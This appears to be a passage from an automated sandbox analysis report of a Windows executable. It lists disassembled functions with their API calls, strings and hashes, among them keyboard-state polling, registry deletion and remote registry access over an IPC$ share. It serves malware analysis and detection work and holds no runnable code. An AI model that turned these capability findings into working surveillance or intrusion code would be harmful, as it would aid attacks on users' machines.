Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: aac4de95c8cab77682b795f1ee608b824ef2ef1c16f57eb1b3af3f3aa0e49fa8
Instruction ID: 20a7fd53d301464ebf5b319f36d6abe5837c4b62333b43f3676abb03d2940dc3
Opcode Fuzzy Hash: aac4de95c8cab77682b795f1ee608b824ef2ef1c16f57eb1b3af3f3aa0e49fa8
Instruction Fuzzy Hash: E591AAB2104205DBDB04DF14C985FAA77E9FF84314F048669FE869A0D6EB38ED45CBA1

Function 00738D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00738D5A
GetFocus.USER32 ref: 00738D6A
GetDlgCtrlID.USER32(00000000), ref: 00738D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00738E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00738ECF
GetMenuItemCount.USER32(?), ref: 00738EEC
GetMenuItemID.USER32(?,00000000), ref: 00738EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00738F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00738F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00738FA1

Strings

0, xrefs: 00738E9F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 1d69d6385feb66bf39582a61142d24ea198c3367f6f4ebb2c6edc21ae6af30d4
Instruction ID: df6afca90daaaad7b448a32b007ac2435954f39ed51c10d934c9f0ea8a7e9bf0
Opcode Fuzzy Hash: 1d69d6385feb66bf39582a61142d24ea198c3367f6f4ebb2c6edc21ae6af30d4
Instruction Fuzzy Hash: D281D171504311AFE761DF24C884EABBBE9FF88354F14491DF994A7292DB38D901CB62

Function 0072CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0072CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0072CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0072CD48

Part of subcall function 0072CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0072CCAA
Part of subcall function 0072CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0072CCBD
Part of subcall function 0072CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0072CCCF
Part of subcall function 0072CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0072CD05
Part of subcall function 0072CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0072CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0072CCF3

Strings

advapi32.dll, xrefs: 0072CCB8
RegDeleteKeyExW, xrefs: 0072CCC9

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 0db65943e506dfa2b9233eaf691fc57c9065fd270cdc635b296a410a066b8676
Instruction ID: 0c9b937aa7d8f24096ba8d26a1e2a6fff004a54991274e09c13941841cd11a66
Opcode Fuzzy Hash: 0db65943e506dfa2b9233eaf691fc57c9065fd270cdc635b296a410a066b8676
Instruction Fuzzy Hash: 5C3180B5A01129BBE7228B61EC88EFFBB7CEF15741F004165A906E7140D6789E45EBB0

Function 0070E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0070E6B4

Part of subcall function 006BE551: timeGetTime.WINMM(?,?,0070E6D4), ref: 006BE555

Sleep.KERNEL32(0000000A), ref: 0070E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0070E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0070E727
SetActiveWindow.USER32 ref: 0070E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0070E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0070E773
Sleep.KERNEL32(000000FA), ref: 0070E77E
IsWindow.USER32 ref: 0070E78A
EndDialog.USER32(00000000), ref: 0070E79B

Strings

BUTTON, xrefs: 0070E719

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 0768d6cdf5062dfb11b8bf8d5aaca7385c0550e05dfdfc736fd125d0d06750cd
Instruction ID: 93171b1712206e5081e77dfeca2b9b63a28fe41a93897102e2304d62b7997657
Opcode Fuzzy Hash: 0768d6cdf5062dfb11b8bf8d5aaca7385c0550e05dfdfc736fd125d0d06750cd
Instruction Fuzzy Hash: 652162B1300204EFFB016F24EC89A253BA9E75438AF649925F51AD15E2DB7E9C419B1C

Function 0070E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0070EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0070EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0070EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0070EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0070EAA7

Strings

play PlayMe wait, xrefs: 0070EA91
alias PlayMe, xrefs: 0070EA36
open , xrefs: 0070EA0C
status PlayMe mode, xrefs: 0070EA58
play PlayMe, xrefs: 0070EAA2
close PlayMe, xrefs: 0070EA6E, 0070EA9B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 47d6a27abeac35565e765330b665fab178ca5dd21412a2fde3a894cb0196904f
Instruction ID: 21f06329cda9b778a28cdace0f04dae0d0b8fd59f49b479479c9c48f8fd354af
Opcode Fuzzy Hash: 47d6a27abeac35565e765330b665fab178ca5dd21412a2fde3a894cb0196904f
Instruction Fuzzy Hash: 161151B1A5026979D760B7A1DC4ADFF6ABCEBD6B40F44492D7C02A20D1EEB41D05C9B0

Function 006B8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 006B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006B8BE8,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006B8FC5

DestroyWindow.USER32(?), ref: 006B8C81
KillTimer.USER32(00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006B8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 006F6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006F69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006F69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,006B8BBA,00000000), ref: 006F69D4
DeleteObject.GDI32(00000000), ref: 006F69E6

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 37abb6adb3420ff4155ff221bedf60567fbedc66a8be02f435baf2750aafea36
Instruction ID: 09191c7d0aa15586a177b0927d198bc55e3bc274aaf94f232fb08bde55e344d2
Opcode Fuzzy Hash: 37abb6adb3420ff4155ff221bedf60567fbedc66a8be02f435baf2750aafea36
Instruction Fuzzy Hash: 5861DCB1002705DFDB268F18C948BB57BF6FB40352F54881CE2469B660CB79A8D2DF98

Function 006B9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 006B9944: GetWindowLongW.USER32(?,000000EB), ref: 006B9952

GetSysColor.USER32(0000000F), ref: 006B9862

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 487991aaa57c3c6f9039ef20de7dbde451259fc43dda6daf6b6b59d2b775b7b2
Instruction ID: 532dc5fb92832fb5d5a0eadc8579d4cc0adcefe79de17b875be8637deeeacd59
Opcode Fuzzy Hash: 487991aaa57c3c6f9039ef20de7dbde451259fc43dda6daf6b6b59d2b775b7b2
Instruction Fuzzy Hash: 7841B7B11046549FDB215F389C44BF937B6EB06331F148A15FBA29B2E1D7359C82DB20

Function 006D8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

.l, xrefs: 006D903A, 006D8FD0, 006D8FF2

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: .l
API String ID: 0-3986846653
Opcode ID: 59540dcf72021866e132638e56e921c181195679fc3f0a28d7aede32c3bfa57b
Instruction ID: 80de434d18419b0b9bcf76c353f935900dc36dbb56afd15ded32821f958e2ad2
Opcode Fuzzy Hash: 59540dcf72021866e132638e56e921c181195679fc3f0a28d7aede32c3bfa57b
Instruction Fuzzy Hash: 86C1D274E04349AFDB21EFA8D845BEDBBB2AF09310F14409EE519A7392C7349A41CB75

Function 007096E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,006EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00709717
LoadStringW.USER32(00000000,?,006EF7F8,00000001), ref: 00709720

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,006EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00709742
LoadStringW.USER32(00000000,?,006EF7F8,00000001), ref: 00709745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00709866

Strings

Error: , xrefs: 0070981D
^ ERROR, xrefs: 007097FB
%s (%d) : ==> %s: %s %s, xrefs: 0070984A
Line %d (File "%s"):, xrefs: 0070978F
Line %d:, xrefs: 007097A0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 8902fd768f0886a768f449ec5f3a3ff5a274d5dda815ee89ab2c74ea128f66ad
Instruction ID: 023cf2a8adb630f5aa765e847e8de1e92dd9b3e287cbeca3f5f2a566147aaa5a
Opcode Fuzzy Hash: 8902fd768f0886a768f449ec5f3a3ff5a274d5dda815ee89ab2c74ea128f66ad
Instruction Fuzzy Hash: E8415D72800219AACF44FBE0CD46DEE7779AF56340F604129F60672192EB396F48CF65

Function 007006DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007007A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007007BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007007DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00700804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0070082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00700837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0070083C

Strings

\IPC$, xrefs: 00700784
SOFTWARE\Classes\, xrefs: 0070070E
\CLSID, xrefs: 00700724

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: d2adfb4593ba3f92ed5fc0639386b9b1c40914a4c0398bdf7808bd971f773b40
Instruction ID: 98cbc07952619a108fbf98ae40bea86ad9c0b5faf3c9919b3635668f953cfc1b
Opcode Fuzzy Hash: d2adfb4593ba3f92ed5fc0639386b9b1c40914a4c0398bdf7808bd971f773b40
Instruction Fuzzy Hash: ED41E876C10229ABDF15EBA4DC959EDB7B9BF04350F548129F901B31A1EB386E04CFA4

Function 00717A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00717AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00717B8F
SHGetDesktopFolder.SHELL32(?), ref: 00717BA3
CoCreateInstance.OLE32(0073FD08,00000000,00000001,00766E6C,?), ref: 00717BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00717C74
CoTaskMemFree.OLE32(?,?), ref: 00717CCC
SHBrowseForFolderW.SHELL32(?), ref: 00717D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00717D7A
CoTaskMemFree.OLE32(00000000), ref: 00717D81
CoTaskMemFree.OLE32(00000000), ref: 00717DD6
CoUninitialize.OLE32 ref: 00717DDC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 0f0c8e4b51b2ded01ed399980b8bf80bc18d8b719816bd38a13d10a45bb81832
Instruction ID: 5f2caa4b14e47d6aa8d28aec5fe113e3bb43394e212fdf976c19ac044a58aa10
Opcode Fuzzy Hash: 0f0c8e4b51b2ded01ed399980b8bf80bc18d8b719816bd38a13d10a45bb81832
Instruction Fuzzy Hash: DFC11D75A04109AFDB14DFA8C884DAEBBF9FF48314B148499F4169B261D734EE81CB94

Function 0073541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00735504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00735515
CharNextW.USER32(00000158), ref: 00735544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00735585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0073559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007355AC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: e22e272857cb044f7f7160e7ab893d10d3d1b5b06c64c22bb5b08d891d5b1450
Instruction ID: 90af93be2cb8b022c471e2b8ac513b0572b6398aff42435419e9a645adb513f4
Opcode Fuzzy Hash: e22e272857cb044f7f7160e7ab893d10d3d1b5b06c64c22bb5b08d891d5b1450
Instruction Fuzzy Hash: AE61AE71900608EFEF11CF54CC85EFE7BB9EB09721F108185F925AB292D7789A80DB60

Function 006FFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006FFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 006FFB08
VariantInit.OLEAUT32(?), ref: 006FFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 006FFB3A
VariantCopy.OLEAUT32(?,?), ref: 006FFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 006FFBA1
VariantClear.OLEAUT32(?), ref: 006FFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 006FFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006FFBCC
VariantClear.OLEAUT32(?), ref: 006FFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006FFBE9

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 20f3b729237dfad8943410177adfc1ce87c93b93e4fd8b438b8ff33ed7d79a96
Instruction ID: e078e6f5603ad9849c64ebcb3b2633accb5d8bd4e1d682895176e0d8dcea8601
Opcode Fuzzy Hash: 20f3b729237dfad8943410177adfc1ce87c93b93e4fd8b438b8ff33ed7d79a96
Instruction Fuzzy Hash: 2F417F75A00219DFDB01DFA4D8549FEBBBAFF48355F008069E906A7261CB34E945CF94

Function 00709C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00709CA1
GetAsyncKeyState.USER32(000000A0), ref: 00709D22
GetKeyState.USER32(000000A0), ref: 00709D3D
GetAsyncKeyState.USER32(000000A1), ref: 00709D57
GetKeyState.USER32(000000A1), ref: 00709D6C
GetAsyncKeyState.USER32(00000011), ref: 00709D84
GetKeyState.USER32(00000011), ref: 00709D96
GetAsyncKeyState.USER32(00000012), ref: 00709DAE
GetKeyState.USER32(00000012), ref: 00709DC0
GetAsyncKeyState.USER32(0000005B), ref: 00709DD8
GetKeyState.USER32(0000005B), ref: 00709DEA

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 57ccbee1011ca9feea5a136210d65e4beda19bcd0e7cecbb5c325b6e9f053f87
Instruction ID: 92f293f097615694c1789cbddde2a3241243b7a725fda32facb2519f65b7909d
Opcode Fuzzy Hash: 57ccbee1011ca9feea5a136210d65e4beda19bcd0e7cecbb5c325b6e9f053f87
Instruction Fuzzy Hash: 2C41B634A447C9E9FF719670C8143B6BEE06B11344F04825ADBC6566C3EBAD9DC8C7A2

Function 0072055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007205BC
inet_addr.WSOCK32(?), ref: 0072061C
gethostbyname.WSOCK32(?), ref: 00720628
IcmpCreateFile.IPHLPAPI ref: 00720636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007206C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007206E5
IcmpCloseHandle.IPHLPAPI(?), ref: 007207B9
WSACleanup.WSOCK32 ref: 007207BF

Strings

Ping, xrefs: 00720676

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 07c4a13554d5c04062e71a3d0a9688f6684deb449f366b94091308e14c95cba0
Instruction ID: 1f4ed49a9cb1899eae5e6b3ef855c946830810131129e30cceca05b6d3eb42ae
